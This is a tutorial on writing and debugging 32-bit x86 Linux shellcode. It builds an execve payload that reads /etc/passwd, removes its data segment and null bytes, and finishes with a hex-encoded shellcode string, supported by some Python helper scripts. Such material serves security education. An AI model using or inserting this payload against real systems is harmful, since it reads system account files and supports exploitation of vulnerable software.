Most of the programs we use every day contain bugs. A bug is a defect in a program that can make it behave incorrectly or take unwanted actions. Some bugs are vulnerabilities, which can be exploited by writing code usually called an exploit. The most common vulnerabilities include memory corruption issues such as buffer overflows and heap overflows, as well as race conditions and format string attacks. In this article we won’t learn to write an exploit, nor how to search for a vulnerability in software; instead we will see how to write and analyze shellcode, and how it relates to the above.

Shellcode is generally regarded as a program that starts a shell, and it is used as the payload of an exploit. In reality, shellcode can do anything a normal program can do. It is executed after the vulnerability has been exploited.

In this article, we will analyze and write shellcode for Linux on the 32-bit x86 architecture.
I specify the architecture because shellcode is usually written in assembly language, and each processor family has its own instruction set. In addition, each operating system has its own system calls for requesting services from the kernel.

On 32-bit x86 Linux, a system call is made with the int 0x80 instruction; the kernel then reads the EAX register to get the number of the system call. Each system call is identified by a unique number that the kernel recognizes, and its arguments are passed in EBX, ECX and EDX, in that order.
The Linux system call numbers are listed (on Ubuntu) in the following file:

/usr/src/linux-headers-3.0.0-25/arch/x86/include/asm/unistd_32.h
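
The header consists of lines such as "#define __NR_execve 11". As a rough sketch in Python, the numbers can be pulled out as shown below. The function name parse_syscalls and the hand-written sample text are illustrative assumptions, not part of any kernel tooling; on a real system you would read the file named above instead.

```python
import re

# Sample lines in the format used by unistd_32.h (an excerpt written out
# by hand for illustration; read the real header on your system instead).
SAMPLE_HEADER = """\
#define __NR_exit 1
#define __NR_fork 2
#define __NR_read 3
#define __NR_write 4
#define __NR_execve 11
"""

def parse_syscalls(header_text):
    """Map system call names to numbers from '#define __NR_name N' lines."""
    pattern = re.compile(
        r"^#define[ \t]+__NR_(\w+)[ \t]+(\d+)[ \t]*$", re.MULTILINE
    )
    return {name: int(num) for name, num in pattern.findall(header_text)}

syscalls = parse_syscalls(SAMPLE_HEADER)
print(syscalls["execve"])   # the value loaded into eax before int 0x80
```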

It’s time to start!
Let’s write our first shellcode. I have chosen a fairly simple one, so that the steps needed to analyze and optimize it are easier to follow. We want shellcode that uses the “cat” command to display the contents of the file /etc/passwd (this file contains information about the system’s accounts).

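;/bin/cat /etc/passwd
section .data
    cmd db '/bin/cat', 0
    file db '/etc//passwd', 0   ; strings passed to execve must end with 0
section .text
global _start
_start:
    ; execve("/bin/cat",["/bin/cat", "/etc//passwd"], NULL)
    mov eax, 11     ; system call number of execve
    mov edx, 0      ; third argument: envp = NULL
    mov ebx,cmd     ; first argument: address of "/bin/cat"
    push edx        ; argv[2] = NULL (terminates the array)
    mov ecx,file
    push ecx        ; argv[1] = address of "/etc//passwd"
    push ebx        ; argv[0] = address of "/bin/cat"
    mov ecx,esp     ; second argument: address of the argv array
    int 80h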

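To assemble, link and run the program, and so view the contents of the file /etc/passwd, use the following commands (on a 64-bit host, ld also needs the -m elf_i386 option to link a 32-bit object):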

$ nasm -f elf shellcode00.asm
$ ld -o shellcode00 shellcode00.o
$ ./shellcode00

As expected, the shellcode shows the contents of the passwd file. Now look at what has been written: the code consists of a “.data” section and a “.text” section. The data section declares the variables cmd and file, and the text section contains the code required to run the command “cat /etc/passwd”. In particular, it uses the execve system call, which in Linux is used to execute a program. The first argument is a pointer to the string “/bin/cat”, the program to execute. The second argument is a pointer to an array of string pointers (argv): it holds the program name “/bin/cat” and the argument passed to it, “/etc//passwd”, and must be terminated by a 32-bit null pointer. The third and final argument (the environment) is not used here, so it is a null pointer.

The first instruction we meet is “mov eax, 11”; 11 is the number of the execve system call.

We now start debugging with gdb.

We step through the program up to the instruction “mov ecx, esp” and examine the registers ebx and ecx.

We note that the ebx register contains the address of the string “/bin/cat”, while the ecx register contains the address of the string “/etc//passwd”. We also take a look at the stack.

After the instruction “mov ecx, esp”, as the stack shows, the ecx register points to the array holding the addresses of “/bin/cat” and “/etc//passwd”, followed by a null pointer.
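
The effect of the three pushes can be modelled with a few lines of Python. This is only a sketch of the stack layout, not a debugger trace: the Stack class, the starting value of esp and the two addresses standing in for the cmd and file labels are all made-up values for illustration.

```python
class Stack:
    """Tiny model of a 32-bit, downward-growing stack (illustration only)."""

    def __init__(self, top=0xBFFFF000):   # hypothetical initial esp
        self.esp = top
        self.mem = {}                      # address -> 32-bit value

    def push(self, value):
        self.esp -= 4                              # esp moves down by 4...
        self.mem[self.esp] = value & 0xFFFFFFFF    # ...then the dword is stored

    def dwords_from_esp(self, count):
        """Read `count` dwords starting at esp, lowest address first."""
        return [self.mem[self.esp + 4 * i] for i in range(count)]

# Hypothetical addresses standing in for the cmd and file labels.
CMD_ADDR = 0x080490A4     # "/bin/cat" plus its terminator is 9 bytes long
FILE_ADDR = 0x080490AD    # so "/etc//passwd" starts 9 bytes later

stack = Stack()
stack.push(0)             # push edx -> argv[2] = NULL
stack.push(FILE_ADDR)     # push ecx -> argv[1]
stack.push(CMD_ADDR)      # push ebx -> argv[0]
argv = stack.dwords_from_esp(3)   # what ecx points to after mov ecx, esp
print([hex(v) for v in argv])
```

Because the stack grows toward lower addresses, the values are pushed in reverse order so that argv[0] ends up at the lowest address, where esp (and then ecx) points.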

The code we’ve written has some major problems. The first is the data segment: once shellcode has been injected into a running program, it cannot know where its variables will be located in memory, so to run correctly its code must not depend on their absolute addresses. The next step is therefore to remove the data segment. To do this, we use the following instructions:

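jmp end             ; jump forward to the call at the end
start:
pop ecx             ; ecx = address of the string after the call
; ... rest of the shellcode ...
end:
call start          ; pushes the address of the next byte, i.e. the string
db '/etc//passwd'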

This method solves the problem: because the string is placed immediately after the call instruction, the call pushes the string's address onto the stack as its return address. The pop instruction then takes that address off the stack and places it in a register, in our case ecx.
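
Both jmp and call encode their target as a displacement relative to the address of the next instruction. The Python sketch below computes the two encodings; the helper names jmp_short and call_near are made up for this example, and the offsets (jmp at 0, start at 2, end at 33) are assumed for illustration, chosen to match the byte layout of the final listing in this article.

```python
import struct

def jmp_short(at, target):
    """Encode 'jmp short': opcode eb + signed 8-bit displacement.

    The displacement is measured from the end of the 2-byte instruction.
    """
    return b"\xeb" + struct.pack("<b", target - (at + 2))

def call_near(at, target):
    """Encode 'call rel32': opcode e8 + signed 32-bit displacement.

    The displacement is measured from the end of the 5-byte instruction.
    """
    return b"\xe8" + struct.pack("<i", target - (at + 5))

# Assumed offsets: jmp at 0, label 'start' at 2, label 'end' at 33.
print(jmp_short(0, 33).hex())   # short forward jump
print(call_near(33, 2).hex())   # backward call
```

The layout matters: a backward call has a negative displacement, whose upper bytes are ff rather than 00, whereas a forward call over the same distance would put zero bytes into the code.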
Applying the jmp/call/pop technique, we change the code as follows (create a new file shellcode01.asm):

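BITS 32
jmp end
start:
 ; execve("/bin/cat",["/bin/cat", "/etc//passwd"], NULL)
 pop ecx                ; ecx = address of "/etc//passwd"
 mov eax, 11            ; system call number of execve
 mov edx, 0             ; envp = NULL
 push 0                 ; terminator for "/bin/cat"
 push dword 0x7461632f  ; "/cat"
 push dword 0x6e69622f  ; "/bin"
 mov ebx,esp            ; ebx = address of "/bin/cat"
 push edx               ; argv[2] = NULL
 push ecx               ; argv[1] = address of "/etc//passwd"
 push ebx               ; argv[0] = address of "/bin/cat"
 mov ecx,esp            ; ecx = address of the argv array
 int 80h
end:
 call start
 db '/etc//passwd'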

BITS 32 tells nasm to generate 32-bit code. Note that I decided to build the string /bin/cat on the stack with the instructions:

push dword 0x7461632f ; /cat
push dword 0x6e69622f ; /bin
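
The immediates are simply the string cut into 4-byte chunks, each read as a little-endian number, with the last chunk pushed first. A small Python sketch of that conversion follows; the helper name push_dwords is an assumption made for this example.

```python
import struct

def push_dwords(text):
    """Return the 32-bit immediates to push, in push order, for `text`.

    The length must be a multiple of 4. The stack grows downward, so the
    last four bytes are pushed first; each chunk is read as little-endian.
    """
    data = text.encode("ascii")
    if len(data) % 4 != 0:
        raise ValueError("pad the string to a multiple of 4 bytes")
    chunks = [data[i:i + 4] for i in range(0, len(data), 4)]
    return [struct.unpack("<I", chunk)[0] for chunk in reversed(chunks)]

for value in push_dwords("/bin/cat"):
    print("push dword 0x%08x" % value)
```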

Then run the program (debugging with gdb) until the instruction "mov ecx, esp"

As the debugger shows, esp points to an array holding the address of the string "/bin/cat" and the address of the string "/etc//passwd"; after the instruction mov ecx, esp, the ecx register holds exactly the second argument of the execve function.
Let us now turn to the second problem, null bytes. Shellcode is often injected through string-handling functions such as strcpy, which stop copying at the first zero byte, so the machine code must not contain any. We therefore examine the disassembly of the binary file to see whether there are any in our code.

As you can see, there are null bytes in the following lines:

 8048063: b8 0b 00 00 00 mov $0xb,%eax
 8048068: ba 00 00 00 00 mov $0x0,%edx

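This is because eax and edx are 32-bit registers, so their immediate operands are encoded as four bytes, while the values we load fit in a single byte. Using the 8-bit registers al and dl, which hold the least significant byte of eax and edx, shortens the immediate to one byte:

 8048069: b0 0b mov $0xb,%al
 804806b: b2 00 mov $0x0,%dl

This removes the null bytes from the first instruction, but "mov dl, 0" still carries a zero immediate. Moreover, writing to al or dl leaves the upper 24 bits of the register unchanged, so the registers must be cleared first. The "xor" instruction does this safely: xor of a register with itself always yields zero, and its encoding contains no null bytes. The "push 0" instruction also encodes a zero immediate, which is why the next version pushes a zeroed register instead.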
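
To check an encoding for zero bytes without reading the disassembly by eye, a few lines of Python are enough. The sketch below uses the opcode bytes quoted in this article plus the standard two-byte encodings of xor eax, eax and xor edx, edx; the names zero_offsets and ENCODINGS are made up for this example.

```python
def zero_offsets(code):
    """Return the offsets of all zero bytes in a machine-code byte string."""
    return [i for i, byte in enumerate(code) if byte == 0]

# Instruction text -> encoding (32-bit mode).
ENCODINGS = {
    "mov eax, 11":  bytes.fromhex("b80b000000"),
    "mov al, 11":   bytes.fromhex("b00b"),
    "mov dl, 0":    bytes.fromhex("b200"),
    "xor eax, eax": bytes.fromhex("31c0"),
    "xor edx, edx": bytes.fromhex("31d2"),
}

for text, code in ENCODINGS.items():
    print(f"{text:14} {code.hex():12} zero bytes at {zero_offsets(code)}")
```

Note that "mov dl, 0" is still reported as containing a zero byte, while "xor edx, edx" clears the whole register without one.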

The complete code then becomes (create a new file shellcode02.asm):

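BITS 32
jmp end
start:
 ; execve("/bin/cat",["/bin/cat", "/etc//passwd"], NULL)
 pop ecx                ; ecx = address of "/etc//passwd"
 xor eax,eax            ; clear the registers without null bytes
 xor edx,edx
 xor ebx,ebx
 mov al, 11             ; system call number of execve
 mov dl, 0              ; redundant after xor edx,edx; encodes as b2 00
 push ebx               ; terminator for "/bin/cat" (ebx is zero)
 push dword 0x7461632f  ; "/cat"
 push dword 0x6e69622f  ; "/bin"
 mov ebx,esp            ; ebx = address of "/bin/cat"
 push edx               ; argv[2] = NULL
 push ecx               ; argv[1] = address of "/etc//passwd"
 push ebx               ; argv[0] = address of "/bin/cat"
 mov ecx,esp            ; ecx = address of the argv array
 int 80h
end:
 call start
 db '/etc//passwd'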

Finally, assemble and link the code, then disassemble the result (for example with objdump -d shellcode02) to see each instruction with its corresponding opcodes:

$ nasm -f elf shellcode02.asm
$ ld -o shellcode02 shellcode02.o

Then we can write our shellcode in the form that we are used to seeing, as shown below:

char shellcode[] ="\xeb\x1f\x59\x31\xc0\x31\xd2\x31\xdb\xb0\x0b\xb2\x00"
 "\x53\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3"
 "\x52\x51\x53\x89\xe1\xcd\x80\xe8\xdc\xff\xff\xff\x2f"
 "\x65\x74\x63\x2f\x2f\x70\x61\x73\x73\x77\x64";

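At this point we have a working piece of shellcode that prints the contents of /etc/passwd. Note that it still contains one null byte, the zero immediate of "mov dl, 0"; since edx has already been cleared by xor, that instruction can be dropped (and the jmp and call displacements adjusted) to make the shellcode free of null bytes. The terminating zero that C appends to the string literal also serves as the terminator of the "/etc//passwd" string.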
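
A C array in this form does not have to be typed by hand. As a sketch, assuming the raw machine code is available as bytes (for instance from a flat binary produced with nasm -f bin), the Python helper below formats it; the function name to_c_literal and its parameters are made up for this example.

```python
def to_c_literal(code, per_line=13, name="shellcode"):
    """Format raw bytes as a C char array made of hex escapes."""
    rows = []
    for i in range(0, len(code), per_line):
        chunk = code[i:i + per_line]
        rows.append('    "' + "".join("\\x%02x" % b for b in chunk) + '"')
    return "char %s[] =\n%s;" % (name, "\n".join(rows))

# The first nine bytes of the shellcode above, used as sample input.
print(to_c_literal(bytes.fromhex("eb1f5931c031d231db")))
```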

Conclusion

As we have seen, assembly language is at the heart of effective and efficient shellcode. Shellcode is therefore often created to target one specific combination of processor, operating system and service pack, called a platform. For some exploits, due to the constraints put on the shellcode by the target process, a very specific shellcode must be created. However, it is not impossible for one shellcode to work for multiple exploits, service packs, operating systems and even processors [1].

Therefore, if you are familiar with assembly language and the architecture of operating systems, there is no barrier to limit your imagination.

References

[1] http://en.wikipedia.org/wiki/Shellcode#Platforms